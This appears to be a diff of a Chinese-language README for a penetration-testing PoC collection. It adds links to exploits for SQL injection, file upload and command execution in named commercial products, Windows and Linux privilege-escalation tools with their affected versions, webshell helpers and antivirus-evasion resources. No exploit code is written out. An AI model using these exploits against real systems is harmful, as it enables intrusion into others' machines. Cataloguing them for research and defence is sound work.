 - [CVE-2020-2546，CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3](https://github.com/hktalent/CVE_2020_2546)|[CVE-2020-2883-Weblogic coherence.jar RCE](https://github.com/Y4er/CVE-2020-2883)|[WebLogic-Shiro-shell-WebLogic利用CVE-2020-2883打Shiro rememberMe反序列化漏洞，一键注册filter内存shell](https://github.com/Y4er/WebLogic-Shiro-shell)|[shiro_rce_tool：可能是最好用的shiro利用工具](https://github.com/wyzxxz/shiro_rce_tool)|[ShiroExploit：ShiroExploit 是一款 Shiro 可视化利用工具，集成密钥爆破，命令回显内存马注入等功能](https://github.com/KpLi0rn/ShiroExploit)
 - [tongda_oa_rce-通达oa 越权登录+文件上传getshell](https://github.com/clm123321/tongda_oa_rce)
 - [CVE-2020-11651-SaltStack Proof of Concept【认证绕过RCE漏洞】](https://github.com/0xc0d/CVE-2020-11651)|[CVE-2020-11651&&CVE-2020-11652 EXP](https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP)
-- [showdoc的api_page存在任意文件上传getshell](./showdoc的api_page存在任意文件上传getshell.md)
+- [showdoc的api_page存在任意文件上传getshell](./web/showdoc的api_page存在任意文件上传getshell.md)
 - [Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法](https://github.com/CaijiOrz/fastjson-1.2.47-RCE)
 - [SpringBoot_Actuator_RCE](https://github.com/jas502n/SpringBoot_Actuator_RCE)
 - [jizhicms(极致CMS)v1.7.1代码审计-任意文件上传getshell+sql注入+反射XSS](./books/jizhicms(极致CMS)v1.7.1代码审计引发的思考.pdf)
@@ -227,13 +236,13 @@
 - [CVE-2020-14645-WebLogic 远程代码执行漏洞](https://github.com/Y4er/CVE-2020-14645)|[Weblogic_CVE-2020-14645](https://github.com/DSO-Lab/Weblogic_CVE-2020-14645)
 - [CVE-2020-6287-SAP NetWeaver AS JAVA 授权问题漏洞-创建用户EXP](https://github.com/duc-nt/CVE-2020-6287-exploit)|[SAP_RECON-PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)](https://github.com/chipik/SAP_RECON)
 - [CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029-jenkins-rce](https://github.com/orangetw/awesome-jenkins-rce-2019)
-- [CVE-2020-3452：Cisco ASA/FTD 任意文件读取漏洞](./CVE-2020-3452：Cisco_ASAFTD任意文件读取漏洞.md)
+- [CVE-2020-3452：Cisco ASA/FTD 任意文件读取漏洞](./web/CVE-2020-3452：Cisco_ASAFTD任意文件读取漏洞.md)
 - [74CMS_v5.0.1后台RCE分析](./books/74CMS_v5.0.1后台RCE分析.pdf)
 - [CVE-2020-8163 - Remote code execution of user-provided local names in Rails](https://github.com/sh286/CVE-2020-8163)
-- [【0day RCE】Horde Groupware Webmail Edition RCE](./%E3%80%900day%20RCE%E3%80%91Horde%20Groupware%20Webmail%20Edition%20RCE.md)
+- [【0day RCE】Horde Groupware Webmail Edition RCE](./web/【0day%20RCE】Horde%20Groupware%20Webmail%20Edition%20RCE.md)
 - [pulse-gosecure-rce-Tool to test for existence of CVE-2020-8218](https://github.com/withdk/pulse-gosecure-rce-poc)
 - [Exploit for Pulse Connect Secure SSL VPN arbitrary file read vulnerability (CVE-2019-11510)](https://github.com/BishopFox/pwn-pulse)
-- [Zblog默认Theme_csrf+储存xss+getshell](./Zblog默认Theme_csrf+储存xss+getshell.md)
+- [Zblog默认Theme_csrf+储存xss+getshell](./web/Zblog默认Theme_csrf+储存xss+getshell.md)
 - [用友GRP-u8 注入+天融信TopApp-LB 负载均衡系统sql注入](https://mrxn.net/Infiltration/292.html)|[绿盟UTS综合威胁探针管理员任意登录复现](https://mrxn.net/Infiltration/276.html)|[HW弹药库之深信服EDR 3.2.21 任意代码执行漏洞分析](https://mrxn.net/jswz/267.html)
 - [CVE-2020-13935-Tomcat的WebSocket安全漏洞可导致拒绝服务攻击](https://github.com/RedTeamPentesting/CVE-2020-13935)
 - [Douphp 网站后台存储型XSS漏洞分析](./books/Douphp%20网站后台存储型XSS漏洞分析.pdf)-[原文地址](https://mp.weixin.qq.com/s/dmFoMJaUH_ULnhu_T9jSGA)
@@ -243,7 +252,7 @@
 - [cve-2019-17558-apache solr velocity 注入远程命令执行漏洞 ](https://github.com/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool)
 - [Weblogic Server（CVE-2021-2109 ）远程代码执行漏洞](./books/Weblogic%20Server（CVE-2021-2109%20）远程代码执行漏洞复现.pdf)-[原文地址](https://mp.weixin.qq.com/s/kEi1s3Ki-h7jjdO7gyDsaw)
 - [辰光PHP客服系统源码3.6 前台 getshell-0day](./books/辰光PHP客服系统源码3.620%前台20%getshell-0day.pdf)|[原文地址](https://mp.weixin.qq.com/s/jWqhZYXuBQ2kfpvnWsfeXA)
-- [zzzcms(asp)前台Getshell](./zzzcms(asp)前台Getshell.md)
+- [zzzcms(asp)前台Getshell](./web/zzzcms(asp)前台Getshell.md)
 - [wjdhcms前台Getshell(条件竞争)](./books/wjdhcms前台Getshell(条件竞争).pdf)-[原文地址](https://www.t00ls.net/articles-59727.html)
 - [glpi_cve-2020-11060](https://github.com/zeromirror/cve_2020-11060)-[相关文章](https://xz.aliyun.com/t/9144)
 - [CVE-2021-21315-PoC-Node.js组件systeminformation代码注入漏洞](https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC)
@@ -368,6 +377,7 @@
 - [从 js map 泄露到接管 OSS 对象存储的一次经典案例分享](./books/从%20js%20map%20泄露到接管%20OSS%20对象存储的一次经典案例分享.html)
 - [浅析DolphinPHP新版本的漏洞挖掘](./books/浅析DolphinPHP新版本的漏洞挖掘.html)
 - [通用Tomcat InvokerServlet RCE攻击链挖掘](./books/通用Tomcat%20InvokerServlet%20RCE攻击链挖掘.html)
+- [从 Tomcat JMX Proxy 到 RCE：AccessLogValve 注入利用](https://hackt.us/from-tomcat-jmx-proxy-to-rce-via-accesslogvalve-injection)|[jmx2rce：Tomcat JMX Proxy 未授权 AccessLogValve 注入利用工具（扫描/文件读取/RCE/清理一体化）](https://github.com/Hacktus/jmx2rce)
 - [金和OA C6办公系统全局绕过漏洞分析](./books/金和OA%20C6办公系统全局绕过漏洞分析.html)
 - [关于PHP CGI Windows平台远程代码执行漏洞（CVE-2024-4577）简要说明](./books/关于PHP%20CGI%20Windows平台远程代码执行漏洞（CVE-2024-4577）简要说明.html)
 - [MSSQL注入绕过360执行命令](./books/MSSQL注入绕过360执行命令.html)
@@ -762,27 +772,110 @@
 - [东胜物流软件 MsAnnounceController SQL注入漏洞](https://mrxn.net/jswz/dongsheng-MsAnnounce-GetData-sqli.html)
 - [大蚂蚁 (BigAnt) 即时通讯系统 PublicController 任意文件读取漏洞](https://mrxn.net/jswz/bigant-Public-download.html)
 - [东胜物流软件 MsChDuiController 多个SQL注入漏洞](https://mrxn.net/jswz/dongsheng-MsChDuiController-sqli.html)
+- [九佳易管理系统 picHY.ashx SQL 注入漏洞](https://mrxn.net/jswz/a8erp-HuiYuanDangAn-picHY-sqli.html)
+- [大蚂蚁 (BigAnt) 即时通讯系统 安装程序二次注入致远程代码执行漏洞](https://mrxn.net/jswz/bigant-install-config-rce.html)
+- [青龙面板最新版v2.20.1 鉴权绕过致RCE](https://mrxn.net/jswz/qinglong-auth-bypass-rce.html) | [青龙(qinglong)面板权限绕过致未授权远程代码执行(RCE)漏洞分析复现.md](./qinglong-auth-bypass2rce/青龙(qinglong)面板权限绕过致未授权远程代码执行(RCE)漏洞分析复现.md)
+- [大蚂蚁 (BigAnt) 即时通讯系统 moveDept SQL注入漏洞](https://mrxn.net/jswz/bigant-dept-moveDept-sqli.html)
+- [九佳易管理系统 Ajax_XT.ashx SQL 注入漏洞](https://mrxn.net/jswz/a8erp-Ajax_XT-sqli.html)
+- [九佳易管理系统 PrivilegedCodeDestroy.asmx SQL注入漏洞](https://mrxn.net/jswz/a8erp-Interface-licx-PrivilegedCodeDestroy-sqli.html)
+- [大蚂蚁 (BigAnt) 即时通讯系统 updateLoginName SQL注入漏洞](https://mrxn.net/jswz/bigant-user-updateLoginName-sqli.html)
+- [深信服运维安全管理系统 change_net 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-netConfig-change_net-rce.html)
+- [深信服运维安全管理系统 del_net 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-netConfig-del_net-rce.html)
+- [深信服运维安全管理系统 del_route 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-netConfig-del_route-rce.html)
+- [深信服运维安全管理系统 getLdap 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-getLdap-rce.html)
+- [深信服运维安全管理系统 save_SNMP 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-SNMP-save_SNMP-rce.html)
+- [深信服运维安全管理系统 csspost/update 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-csspost-update-rce.html)
+- [深信服运维安全管理系统 upload_file 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-cssp-app-upload_file-rce.html)
+- [深信服运维安全管理系统 del_patch 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-system-concentration_management-del_patch-rce.html)
+- [深信服运维安全管理系统 install_patch 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-system-concentration_management-install_patch-rce.html)
+- [深信服运维安全管理系统 remote_get_clip_img 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-subforeign-audit-remote_get_clip_img-rce.html)
+- [深信服运维安全管理系统 uninstall_patch 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-system-concentration_management-uninstall_patch-rce.html)
+- [深信服运维安全管理系统 get_clip_img 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-subforeign-audit-get_clip_img-rce.html)
+- [深信服运维安全管理系统 down_load 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-subforeign-audit-down_load-rce.html)
+- [深信服运维安全管理系统 port_validate 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-ip_and_port-port_validate-rce.html)
+- [深信服运维安全管理系统 save_strategy 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-system-node_management-save_strategy-rce.html)
+- [深信服运维安全管理系统 generate_certificate 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-outServices-generate_certificate-rce.html)
+- [深信服运维安全管理系统 update_date 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-timeSet-update_date-rce.html)
+- [深信服运维安全管理系统 upload_CN 远程命令执行漏洞](https://mrxn.net/jswz/sangfor_osm-system-version-upload_CN-rce.html)
+- [深科特 LEAN MES系统 ChooseLineAndRes.ashx SQL 注入漏洞](https://mrxn.net/jswz/lean-mes-ChooseLineAndRes-sqli.html)
+- [深科特 LEAN MES系统 /Handler/SMTLoadingMaterial.ashx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-SMTLoadingMaterial-sqli.html)
+- [深科特 LEAN MES系统 EquipmentTree.ashx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-EquipmentTree-sqli.html)
+- [深科特 LEAN MES系统 UploadPortraits.ashx 文件上传漏洞](https://mrxn.net/jswz/lean-mes-UploadPortraits-fileupload-rce.html)
+- [深科特 LEAN MES系统 /Handler/FileSync.ashx 任意文件读取/上传/删除/SSRF等多个漏洞](https://mrxn.net/jswz/lean-mes-FileSync-fileupload-rce-ssrf-filerad.html)
+- [深科特 LEAN MES系统 DownLoad.aspx 任意文件读取漏洞](https://mrxn.net/jswz/lean-mes-DownLoad-fileread.html)
+- [深科特 LEAN MES系统 /Handler/MobileAppLogin.ashx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-MobileAppLogin-sqli.html)
+- [深科特 LEAN MES系统 PrintUpdate.ashx 任意文件读取/上传/删除漏洞](https://mrxn.net/jswz/lean-mes-PrintUpdate-fileupload-rce-fileread.html)
+- [深科特 LEAN MES系统 TestManagePlatform.ashx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-TestManagePlatform-sqli.html)
+- [深科特 LEAN MES系统 UploadHander.ashx 文件上传漏洞](https://mrxn.net/jswz/lean-mes-UploadHander-fileuplaod-rce.html)
+- [深科特 LEAN MES系统 CreateMenus.aspx 任意文件上传漏洞](https://mrxn.net/jswz/lean-mes-CreateMenus-fileuplaod-rce.html)
+- [深科特 LEAN MES系统 AutoComplete.ashx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-AutoComplete-sqli.html)
+- [深科特 LEAN MES系统 ChooseImage.aspx 任意文件上传/删除漏洞](https://mrxn.net/jswz/lean-mes-ChooseImage-fileupload-rce-filedel.html)
+- [深科特 LEAN MES系统 SetDataSource.aspx SQL注入漏洞](https://mrxn.net/jswz/lean-mes-SetDataSource-sqli.html)
+- [CLIProxyAPI /v1internal:method 未授权访问漏洞](https://mrxn.net/news/CLIProxyAPI-v1internal-method-unauthorized-access.html)
+- [shannon：面向 Web 应用与 API 的自主 AI 渗透测试工具，支持代码感知动态漏洞挖掘与自动化 PoC 验证](https://github.com/KeygraphHQ/shannon)
+- [孚盟云CRM AjaxTrackInfo.ashx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-AjaxTrackInfo-sqli.html)
+- [孚盟云CRM DingHandler.ashx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-DingHandler-sqli.html)
+- [孚盟云CRM PriceList.ashx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-PriceList-sqli.html)
+- [孚盟云CRM WorkFlowHandler.ashx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-WorkFlowHandler-sqli.html)
+- [孚盟云CRM AddInquiry.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-AddInquiry-sqli.html)
+- [孚盟云CRM OrderLook.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-OrderLook-sqli.html)
+- [孚盟云CRM FormDefault.aspx、FormDefaultCommon.aspx 多处SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-FormDefault-sqli.html)
+- [天地伟业Easy7 queryRoomName SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-inquestRoom-queryRoomName-sqli.html)
+- [天地伟业Easy7 queryRoomConfigs SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-inquestRoom-queryRoomConfigs-sqli.html)
+- [天地伟业Easy7 UploadOwnerImage.jsp 文件上传漏洞](https://mrxn.net/jswz/easy7-apps-WebService-UploadOwnerImage-rce.html)
+- [mdserver-web(夸父面板)≤0.18.4 多处未授权访问 + 信息泄露 + RCE 漏洞分析](https://mrxn.net/jswz/mdserver-web-unauthentication-bypass-rce.html)
+- [天地伟业Easy7 GetOtherDomainServer.jsp SSRF漏洞](https://mrxn.net/jswz/easy7-apps-WebService-GetOtherDomainServer-SSRF.html)
+- [天地伟业Easy7 getInquestIdByRoomId SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-inquestRoom-getInquestIdByRoomId-sqli.html)
+- [天地伟业Easy7 getInquestRoomChannelInfo SQL注入漏洞](https://mrxn.net/jswz/1422.html)
+- [V2Board 信息泄露漏洞至权限绕过接管账户（CVE-2026-39912）分析复现](https://mrxn.net/jswz/v2board-data-leak-authentication-bypass.html)
+- [天地伟业Easy7 isHashCameraAuth SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-inquestRoom-isHashCameraAuth-sqli.html)
+- [天地伟业Easy7 getConfigInfoList SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-inquestRoom-getConfigInfoList-sqli.html)
+- [天地伟业Easy7 capture 命令执行漏洞](https://mrxn.net/jswz/easy7-rest-file-capture-rce.html)
+- [天地伟业Easy7 uploadLedImage 文件上传漏洞](https://mrxn.net/jswz/easy7-rest-file-uploadLedImage-rce.html)
+- [天地伟业Easy7 /Easy7/rest/file/delete 文件删除漏洞](https://mrxn.net/jswz/easy7-rest-file-delete.html)
+- [天地伟业Easy7 /Easy7/rest/file/downloadFile 文件读取漏洞](https://mrxn.net/jswz/easy7-rest-file-downloadFile.html)
+- [天地伟业Easy7 /Easy7/rest/file/uploadIdsHttpFile SSRF+文件写入漏洞](https://mrxn.net/jswz/easy7-rest-file-uploadIdsHttpFile-rce.html)
+- [孚盟云CRM CustomizeReportSelectMould.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-CustomizeReport-CustomizeReportSelectMould-sqli.html)
+- [孚盟云CRM ClientNameCard.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Card-ClientNameCard-sqli.html)
+- [孚盟云CRM BusinessPrice.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-BusinessPrice-sqli.html)
+- [cPanel WHM 权限绕过致RCE【cve-2026-41940】](https://github.com/watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py) | [cve-2026-41940 漏洞分析](https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/)
+- [孚盟云CRM BusinessPriceListList.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-BusinessPriceList-sqli.html)
+- [天地伟业Easy7 /Easy7/rest/file/uploadFile 文件上传漏洞](https://mrxn.net/jswz/easy7-rest-file-uploadFile-rce.html)
+- [天地伟业Easy7 /Easy7/rest/file/deleteFile 文件删除漏洞](https://mrxn.net/jswz/easy7-rest-file-deleteFile.html)
+- [天地伟业Easy7 /Easy7/rest/file/download 文件读取漏洞](https://mrxn.net/jswz/easy7-rest-file-download-fileread.html)
+- [天地伟业Easy7 /Easy7/rest/user/getAuthorityByUserId SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-user-getAuthorityByUserId-sqli.html)
+- [天地伟业Easy7 /Easy7/rest/user/IsPermissible SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-user-IsPermissible-sqli.html)
+- [天地伟业Easy7 /Easy7/rest/user/getAuthorityByUserId SQL注入漏洞](https://mrxn.net/jswz/easy7-rest-user-getAuthorityByUserId-sqli-2.html)
+- [孚盟云CRM BusinessPriceOk.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-BusinessPriceOk-sqli.html)
+- [孚盟云CRM BusinessPriceReport.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-BusinessPriceReport-sqli.html)
+- [孚盟云CRM BusiPriceOkPrint.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-BusiPriceOkPrint-sqli.html)
+- [用友 NC 系统 IMsgCenterWebService SQL注入漏洞](https://mrxn.net/jswz/yonyou-nc-IMsgCenterWebService-resetInvacationInfoByUsercode-sqli.html)
+- [孚盟云CRM LoadMailAttachFile.aspx 任意文件读取/移动](https://mrxn.net/jswz/fumacrm-Common-LoadMailAttachFile-FileName-fileread.html)
+- [孚盟云CRM Inquiry.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-Inquiry-sqli.html)
+- [孚盟云CRM Price_detail.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-Price_detail-sqli.html)
+- [孚盟云CRM ProductGrid.aspx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Product-ProductGrid-sqli.html)
+- [孚盟云CRM AjaxProductList.ashx SQL注入漏洞](https://mrxn.net/jswz/fumacrm-Dingding-Ajax-AjaxProductList-sqli.html)
 
 
 ## <span id="head5"> 提权辅助相关</span>
 
-- [windows-kernel-exploits Windows平台提权漏洞集合](https://github.com/SecWiki/windows-kernel-exploits)
+- [windows-kernel-exploits Windows平台提权漏洞集合（Windows XP - Windows 10/Server 2019）](https://github.com/SecWiki/windows-kernel-exploits)
 - [windows 溢出提权小记](https://klionsec.github.io/2017/04/22/win-0day-privilege/)/[本地保存了一份+Linux&Windows提取脑图](./tools/Local%20Privilege%20Escalation.md)
 - [Windows常见持久控制脑图](./tools/Windows常见持久控制.png)
-- [CVE-2019-0803 Win32k漏洞提权工具](./CVE-2019-0803)
-- [脏牛Linux提权漏洞](https://github.com/Brucetg/DirtyCow-EXP)-[reverse_dirty-更改的脏牛提权代码，可以往任意文件写入任意内容](https://github.com/Rvn0xsy/reverse_dirty)|[linux_dirty：更改后的脏牛提权代码，可以往任意文件写入任意内容，去除交互过程](https://github.com/Rvn0xsy/linux_dirty)|[dirtycow-mem：脏牛利用C源码](https://github.com/sqlnetcat/dirtycow-mem)-[文章](https://mp.weixin.qq.com/s/xUhr6D9mGnrE_cJw1kmyFA)-[备份](https://archive.ph/wip/NCL3w)-[备份1](https://web.archive.org/web/20220918065539/https://mp.weixin.qq.com/s/xUhr6D9mGnrE_cJw1kmyFA)
+- [CVE-2019-0803 Win32k漏洞提权工具（Windows 7/8/10, Server 2008/2012/2016/2019）](./CVE-2019-0803)
+- [脏牛Linux提权漏洞（CVE-2016-5195，Linux kernel 2.6.22 - 4.8.2）](https://github.com/Brucetg/DirtyCow-EXP)-[reverse_dirty-更改的脏牛提权代码，可以往任意文件写入任意内容](https://github.com/Rvn0xsy/reverse_dirty)|[linux_dirty：更改后的脏牛提权代码，可以往任意文件写入任意内容，去除交互过程](https://github.com/Rvn0xsy/linux_dirty)|[dirtycow-mem：脏牛利用C源码](https://github.com/sqlnetcat/dirtycow-mem)-[文章](https://mp.weixin.qq.com/s/xUhr6D9mGnrE_cJw1kmyFA)-[备份](https://archive.ph/wip/NCL3w)-[备份1](https://web.archive.org/web/20220918065539/https://mp.weixin.qq.com/s/xUhr6D9mGnrE_cJw1kmyFA)|[CVE-2016-5195：timwr实现的Android版Dirty Cow利用工具](https://github.com/timwr/CVE-2016-5195)
 - [远控免杀从入门到实践之白名单（113个）](https://github.com/TideSec/BypassAntiVirus)|[远控免杀从入门到实践之白名单（113个）总结篇.pdf](./books/远控免杀从入门到实践之白名单（113个）总结篇.pdf)
-- [Linux提权-CVE-2019-13272  A linux kernel Local Root Privilege Escalation vulnerability with PTRACE_TRACEME](https://github.com/jiayy/android_vuln_poc-exp/tree/master/EXP-CVE-2019-13272-aarch64)
+- [Linux提权-CVE-2019-13272  A linux kernel Local Root Privilege Escalation vulnerability with PTRACE_TRACEME（Linux kernel < 5.1.17，aarch64架构）](https://github.com/jiayy/android_vuln_poc-exp/tree/master/EXP-CVE-2019-13272-aarch64)
 - [Linux权限提升辅助一键检测工具](https://github.com/mzet-/linux-exploit-suggester)
 - [将powershell脚本直接注入到进程中执行来绕过对powershell.exe的限制](https://github.com/EmpireProject/PSInject)
 - [CVE-2020-2696 – Local privilege escalation via CDE dtsession](https://github.com/0xdea/exploits/blob/master/solaris/raptor_dtsession_ipa.c)
-- [CVE-2020-0683-利用Windows MSI “Installer service”提权](https://github.com/padovah4ck/CVE-2020-0683/)
+- [CVE-2020-0683-利用Windows MSI “Installer service”提权（Windows 7/8.1/10, Server 2008/2012/2016/2019）](https://github.com/padovah4ck/CVE-2020-0683/)
 - [Linux sudo提权辅助工具—查找sudo权限配置漏洞](https://github.com/TH3xACE/SUDO_KILLER)
-- [Windows提权-CVE-2020-0668：Windows Service Tracing本地提权漏洞](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668)
+- [Windows提权-CVE-2020-0668：Windows Service Tracing本地提权漏洞（Windows 10 ≥ build 1903 使用UsoDllLoader；Windows < build 1903 使用diaghub）](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668)
 - [Linux提取-Linux kernel XFRM UAF poc (3.x - 5.x kernels)2020年1月前没打补丁可测试](https://github.com/duasynt/xfrm_poc)
-- [linux-kernel-exploits Linux平台提权漏洞集合](https://github.com/SecWiki/linux-kernel-exploits)
+- [linux-kernel-exploits Linux平台提权漏洞集合（覆盖 Linux 2.4 - 5.x 内核版本）](https://github.com/SecWiki/linux-kernel-exploits)
 - [Linux提权辅助检测Perl脚本](https://github.com/jondonas/linux-exploit-suggester-2)|[Linux提权辅助检测bash脚本](https://github.com/mzet-/linux-exploit-suggester)|[Unix-PrivEsc：本地 Unix 系统提权集合](https://github.com/FuzzySecurity/Unix-PrivEsc)
-- [CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost](https://github.com/danigargu/CVE-2020-0796)|[【Windows提取】Windows SMBv3 LPE exploit 已编译版.exe](https://github.com/f1tz/CVE-2020-0796-LPE-EXP)|[SMBGhost_RCE_PoC-远程代码执行EXP](https://github.com/chompie1337/SMBGhost_RCE_PoC)|[Windows_SMBv3_RCE_CVE-2020-0796漏洞复现](./books/Windows_SMBv3_RCE_CVE-2020-0796漏洞复现.pdf)|[CVE-2020-0796](https://github.com/ran-sama/CVE-2020-0796)
+- [CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost（Windows 10 version 1903/1909）](https://github.com/danigargu/CVE-2020-0796)|[【Windows提取】Windows SMBv3 LPE exploit 已编译版.exe](https://github.com/f1tz/CVE-2020-0796-LPE-EXP)|[SMBGhost_RCE_PoC-远程代码执行EXP](https://github.com/chompie1337/SMBGhost_RCE_PoC)|[Windows_SMBv3_RCE_CVE-2020-0796漏洞复现](./books/Windows_SMBv3_RCE_CVE-2020-0796漏洞复现.pdf)|[CVE-2020-0796](https://github.com/ran-sama/CVE-2020-0796)
 - [getAV---windows杀软进程对比工具单文件版](./tools/getAV/)
 - [【Windows提权工具】Windows 7 to Windows 10 / Server 2019](https://github.com/CCob/SweetPotato)|[搭配Cobalt Strike的修改版可上线system权限的session](https://github.com/lengjibo/RedTeamTools/tree/master/windows/SweetPotato)|[RoguePotato：又一个 Windows 提权工具](https://github.com/antonioCoco/RoguePotato)
 - [【Windows提权工具】SweetPotato修改版，用于webshell下执行命令](https://github.com/uknowsec/SweetPotato)|[本地编译好的版本](./tools/SweetPotato.zip)|[点击下载或右键另存为](https://raw.githubusercontent.com/Mr-xn/Penetration_Testing_POC/master/tools/SweetPotato.zip)|[SweetPotato_webshell下执行命令版.pdf](./books/SweetPotato_webshell下执行命令版.pdf)|[JuicyPotato修改版-可用于webshell](https://github.com/uknowsec/JuicyPotato)|[JuicyPotatoNG：另一个 juicypotato](https://github.com/antonioCoco/JuicyPotatoNG)|[DCOMPotato: Some Service DCOM Object and SeImpersonatePrivilege abuse.](https://github.com/zcgonvh/DCOMPotato)|[GodPotato: 适用于Windows 2012 - Windows 2022的土豆提权工具](https://github.com/BeichenDream/GodPotato)
@@ -791,53 +884,60 @@
 - [【Windows提权 Windows 10&Server 2019】PrintSpoofer-Abusing Impersonation Privileges on Windows 10 and Server 2019](https://github.com/itm4n/PrintSpoofer)|[配合文章食用-pipePotato复现](./books/pipePotato复现.pdf)|[Windows 权限提升 BadPotato-已经在Windows 2012-2019 8-10 全补丁测试成功](https://github.com/BeichenDream/BadPotato)
 - [【Windows提权】Windows 下的提权大合集](https://github.com/lyshark/Windows-exploits)
 - [【Windows提权】-CVE-2020-1048 | PrintDemon本地提权漏洞-漏洞影响自1996年以来发布(Windows NT 4)的所有Windows版本](https://github.com/ionescu007/PrintDemon)
-- [【Windows bypass UAC】UACME-一种集成了60多种Bypass UAC的方法](https://github.com/hfiref0x/UACME)
+- [【Windows bypass UAC】UACME-一种集成了60多种Bypass UAC的方法（Windows 7 - Windows 11，各方法适用build范围不同）](https://github.com/hfiref0x/UACME)
 - [CVE-2020–1088： Windows wersvc.dll 任意文件删除本地提权漏洞分析](https://medium.com/csis-techblog/cve-2020-1088-yet-another-arbitrary-delete-eop-a00b97d8c3e2)
-- [【Windows提权】CVE-2019-0863-Windows中错误报告机制导致的提权-EXP](https://github.com/sailay1996/WerTrigger)
-- [【Windows提权】CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP)
+- [【Windows提权】CVE-2019-0863-Windows中错误报告机制导致的提权-EXP（Windows 7/8.1/10, Server 2008/2012/2016/2019）](https://github.com/sailay1996/WerTrigger)
+- [【Windows提权 Windows 7/Server 2008 R2】CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP)
 - [【Windows提权】CVE-2020-0787-EXP-ALL-WINDOWS-VERSION-适用于Windows所有版本的提权EXP](https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION)|[CVE-2020-0787：提权带回显](https://github.com/yanghaoi/CVE-2020-0787)|[CVE-2020-0787_CNA：适用于Cobalt Strike的CVE-2020-0787提权文件](https://github.com/yanghaoi/CobaltStrike_CNA/tree/main/ReflectiveDllSource/CVE-2020-0787_CNA)
-- [【Windows提权】CVE-2020-1054-Win32k提权漏洞Poc](https://github.com/0xeb-bp/cve-2020-1054)|[CVE-2020-1054-POC](https://github.com/Iamgublin/CVE-2020-1054)
+- [【Windows提权 Windows 7/8.1/10, Server 2008/2012/2016/2019】CVE-2020-1054-Win32k提权漏洞Poc](https://github.com/0xeb-bp/cve-2020-1054)|[CVE-2020-1054-POC](https://github.com/Iamgublin/CVE-2020-1054)
 - [【Linux提权】对Linux提权的简单总结](./books/对Linux提权的简单总结.pdf)
-- [【Windows提权】wesng-Windows提权辅助脚本](https://github.com/bitsadmin/wesng)|[Windows-Exploit-Suggester：又一个 Windows 提权辅助Python脚本](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
-- [【Windows提权】dazzleUP是一款用来帮助渗透测试人员进行权限提升的工具，可以在window系统中查找脆弱面进行攻击。工具包括两部分检查内容，exploit检查和错误配置检查。](https://github.com/hlldz/dazzleUP)
-- [【Windows提权】KernelHub-近二十年Windows权限提升集合](https://github.com/Ascotbe/KernelHub)
